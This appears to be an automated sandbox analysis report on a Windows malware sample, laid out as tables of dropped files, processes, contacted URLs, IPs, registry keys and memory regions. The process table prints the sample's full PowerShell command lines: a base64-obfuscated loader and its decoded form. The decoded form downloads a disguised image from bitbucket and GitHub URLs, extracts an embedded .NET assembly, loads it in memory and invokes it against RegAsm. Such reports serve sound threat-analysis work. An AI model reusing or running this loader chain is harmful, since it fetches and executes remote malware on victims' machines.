Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
sRMytgfRpJ.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\Public\Desktop\Google Chrome.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working
directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:37 2023,
atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Tmp24A4.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Tmp24C5.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0oado0gh.fjl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_110bzeks.k3h.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nwjw335.j5w.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_baonfytu.a2s.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nz3a2pbi.0k1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5vu10dz.2zh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06
|
data
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\sRMytgfRpJ.exe
|
"C:\Users\user\Desktop\sRMytgfRpJ.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c fqt.vbs
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#DU#MgBs#Gk#dw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#D##Jw#p#Ck#fQB9##==';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe
$OWjuxD .exe -windowstyle hidden -exec
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient;
$shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try
{ return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735',
'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);
$startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag);
$endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex
+= $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex,
$base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);
$type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]]
('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle
hidden -exec
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://bitbucket.org
|
unknown
|
|
|
|
https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735
|
unknown
|
|
|
|
https://raw.githubusercontent.com
|
unknown
|
|
|
|
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/02/sc/sct
|
unknown
|
||
|
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
|
unknown
|
||
|
https://duckduckgo.com/ac/?q=
|
unknown
|
||
|
http://tempuri.org/Entity/Id23ResponseD
|
unknown
|
||
|
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
|
unknown
|
||
|
http://tempuri.org/Entity/Id12Response
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
|
unknown
|
||
|
http://tempuri.org/
|
unknown
|
||
|
http://tempuri.org/Entity/Id2Response
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
|
unknown
|
||
|
http://tempuri.org/Entity/Id21Response
|
unknown
|
||
|
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
|
unknown
|
||
|
https://bitbucket.org/rulmerurk/ertertqw/downloads/wil25.txt
|
185.166.143.49
|
||
|
http://tempuri.org/Entity/Id9
|
unknown
|
||
|
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
|
unknown
|
||
|
http://tempuri.org/Entity/Id8
|
unknown
|
||
|
http://tempuri.org/Entity/Id5
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
|
unknown
|
||
|
http://tempuri.org/Entity/Id4
|
unknown
|
||
|
http://tempuri.org/Entity/Id7
|
unknown
|
||
|
http://tempuri.org/Entity/Id6
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
|
unknown
|
||
|
http://tempuri.org/Entity/Id19Response
|
unknown
|
||
|
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/10/wsat
|
unknown
|
||
|
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
|
unknown
|
||
|
https://aui-cdn.atlassian.com/
|
unknown
|
||
|
http://tempuri.org/Entity/Id15Response
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
|
unknown
|
||
|
http://tempuri.org/Entity/Id6Response
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
https://api.ip.sb/ip
|
unknown
|
||
|
https://bbuseruploads.s3.amazonaws.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/04/sc
|
unknown
|
||
|
http://tempuri.org/Entity/Id1ResponseD
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
|
unknown
|
||
|
http://tempuri.org/Entity/Id9Response
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
|
http://tempuri.org/Entity/Id20
|
unknown
|
||
|
http://tempuri.org/Entity/Id21
|
unknown
|
||
|
http://tempuri.org/Entity/Id22
|
unknown
|
||
|
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
|
unknown
|
||
|
http://tempuri.org/Entity/Id23
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
|
unknown
|
||
|
http://tempuri.org/Entity/Id24
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
|
unknown
|
||
|
http://tempuri.org/Entity/Id24Response
|
unknown
|
||
|
https://www.ecosia.org/newtab/
|
unknown
|
||
|
http://tempuri.org/Entity/Id1Response
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
|
unknown
|
||
|
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/08/addressing
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://cdn.cookielaw.org/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/04/trust
|
unknown
|
||
|
http://tempuri.org/Entity/Id10
|
unknown
|
||
|
http://tempuri.org/Entity/Id11
|
unknown
|
||
|
http://tempuri.org/Entity/Id12
|
unknown
|
||
|
http://tempuri.org/Entity/Id16Response
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
|
unknown
|
||
|
http://tempuri.org/Entity/Id13
|
unknown
|
||
|
http://tempuri.org/Entity/Id14
|
unknown
|
||
|
https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-
|
unknown
|
||
|
http://tempuri.org/Entity/Id15
|
unknown
|
||
|
http://tempuri.org/Entity/Id16
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
|
unknown
|
||
|
http://tempuri.org/Entity/Id17
|
unknown
|
||
|
http://tempuri.org/Entity/Id18
|
unknown
|
||
|
http://tempuri.org/Entity/Id5Response
|
unknown
|
||
|
http://tempuri.org/Entity/Id19
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bitbucket.org
|
185.166.143.49
|
|
|
|
raw.githubusercontent.com
|
185.199.109.133
|
|
|
|
s3-w.us-east-1.amazonaws.com
|
52.216.210.153
|
||
|
bbuseruploads.s3.amazonaws.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.196.9.26
|
unknown
|
Switzerland
|
|
|
|
185.199.109.133
|
raw.githubusercontent.com
|
Netherlands
|
|
|
|
185.166.143.49
|
bitbucket.org
|
Germany
|
|
|
|
52.216.210.153
|
s3-w.us-east-1.amazonaws.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
|
wextract_cleanup0
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Owner
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
SessionHash
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Sequence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
RegFiles0000
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
RegFilesHash
|
There are 17 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2FC1000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
3068000
|
trusted library allocation
|
page read and write
|
|
|
|
158A90B6000
|
trusted library allocation
|
page read and write
|
||
|
3477000
|
trusted library allocation
|
page read and write
|
||
|
158A8CAD000
|
trusted library allocation
|
page read and write
|
||
|
11694687000
|
heap
|
page read and write
|
||
|
5860000
|
trusted library allocation
|
page read and write
|
||
|
1169A756000
|
trusted library allocation
|
page read and write
|
||
|
1FD206EF000
|
heap
|
page read and write
|
||
|
7901000
|
heap
|
page read and write
|
||
|
158A8CCA000
|
trusted library allocation
|
page read and write
|
||
|
3498000
|
trusted library allocation
|
page read and write
|
||
|
11694615000
|
heap
|
page read and write
|
||
|
7928000
|
heap
|
page read and write
|
||
|
7AA8000
|
trusted library allocation
|
page read and write
|
||
|
25F6D070000
|
heap
|
page read and write
|
||
|
1FD20949000
|
heap
|
page read and write
|
||
|
3105000
|
trusted library allocation
|
page read and write
|
||
|
54A0000
|
trusted library allocation
|
page read and write
|
||
|
3162000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
158A72E0000
|
trusted library allocation
|
page read and write
|
||
|
4135000
|
trusted library allocation
|
page read and write
|
||
|
6C40000
|
trusted library allocation
|
page read and write
|
||
|
415B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page read and write
|
||
|
54F5000
|
trusted library allocation
|
page read and write
|
||
|
5520000
|
trusted library allocation
|
page read and write
|
||
|
7C2E000
|
stack
|
page read and write
|
||
|
21BA1FF000
|
stack
|
page read and write
|
||
|
6A00000
|
trusted library allocation
|
page read and write
|
||
|
5840000
|
trusted library allocation
|
page execute and read and write
|
||
|
3148000
|
trusted library allocation
|
page read and write
|
||
|
11694600000
|
heap
|
page read and write
|
||
|
32CD000
|
trusted library allocation
|
page read and write
|
||
|
71DAFE000
|
stack
|
page read and write
|
||
|
5858000
|
trusted library allocation
|
page read and write
|
||
|
1412000
|
trusted library allocation
|
page read and write
|
||
|
2FB0000
|
heap
|
page execute and read and write
|
||
|
7FF7D6FD0000
|
unkown
|
page readonly
|
||
|
1FD20735000
|
heap
|
page read and write
|
||
|
5B00000
|
trusted library allocation
|
page read and write
|
||
|
116A62BD000
|
trusted library allocation
|
page read and write
|
||
|
25F6F5A0000
|
heap
|
page read and write
|
||
|
7FF7D6FD9000
|
unkown
|
page readonly
|
||
|
12B6000
|
heap
|
page read and write
|
||
|
66FE000
|
stack
|
page read and write
|
||
|
25F6CEBB000
|
heap
|
page read and write
|
||
|
7FF7D6FDC000
|
unkown
|
page write copy
|
||
|
1FD20724000
|
heap
|
page read and write
|
||
|
6A20000
|
trusted library allocation
|
page read and write
|
||
|
3402000
|
trusted library allocation
|
page read and write
|
||
|
158A73E5000
|
heap
|
page read and write
|
||
|
410C000
|
trusted library allocation
|
page read and write
|
||
|
71D7CE000
|
stack
|
page read and write
|
||
|
25F6CE85000
|
heap
|
page read and write
|
||
|
116A7FD2000
|
trusted library allocation
|
page read and write
|
||
|
7FF7D6FD9000
|
unkown
|
page readonly
|
||
|
5553000
|
heap
|
page read and write
|
||
|
69C1000
|
trusted library allocation
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page execute and read and write
|
||
|
FA430C000
|
stack
|
page read and write
|
||
|
40F4000
|
trusted library allocation
|
page read and write
|
||
|
11694570000
|
heap
|
page read and write
|
||
|
13F0000
|
heap
|
page read and write
|
||
|
1FD2072B000
|
heap
|
page read and write
|
||
|
158A8CB4000
|
trusted library allocation
|
page read and write
|
||
|
78E7000
|
heap
|
page read and write
|
||
|
3564000
|
trusted library allocation
|
page read and write
|
||
|
116A5FD1000
|
trusted library allocation
|
page read and write
|
||
|
158A7160000
|
heap
|
page read and write
|
||
|
69E1000
|
trusted library allocation
|
page read and write
